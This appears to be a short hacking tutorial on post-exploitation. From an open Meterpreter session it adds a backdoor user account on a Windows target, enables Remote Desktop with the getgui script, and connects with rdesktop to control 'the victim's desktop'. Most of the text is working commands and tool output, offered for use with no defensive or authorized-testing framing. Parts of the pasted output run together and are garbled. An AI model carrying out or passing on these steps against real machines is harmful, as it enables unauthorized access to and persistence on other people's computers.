As I said before, when we have session open in meterpreter or we have access to cmd, we can add rules for the firewall to accept our connection or to disable the firewall. Let's use method getgui -u -p:
-u stands for username and -p stand for password.
When we're in someone's computer cmd (command prompt), we can add user by using:
net user Thinker /add
All we need is now is just to place the newly created username in:
getgui -u Thinker -p ''
This will allow create an open RDP connection for this user.
We can easily use RDESKTOP for remote desktop connection:
meterpreter > run getgui -hWindows Remote Desktop Enabler Meterpreter ScriptUsage: getgui -u -pOr: getgui -eOPTIONS:-e Enable RDP only.-f Forward RDP Connection.-h Help menu.-l The language switchPossible Options: 'de_DE', 'en_EN' / default is: 'en_EN'-p The Password of the usermeterpreter > run getgui -u Thinker -p ''[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez carlos_perez@darkoperator.com[*] Language detection started[*] Language detected: en_US[*] Setting user account for logon[*] Adding User: Thinker with Password: ''[*] Adding User: Thinker to local group ''[*] Adding User: Thinker to local group ''[*] You can now login with the created user[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150122.2458.rc Now open terminal and use exploit pentest/exploit/frameworkjust type rdesktop -u Thinker -p '' < IP > xx.xx.xx.xx
Voila! You'll see a window opened with the victim's desktop.
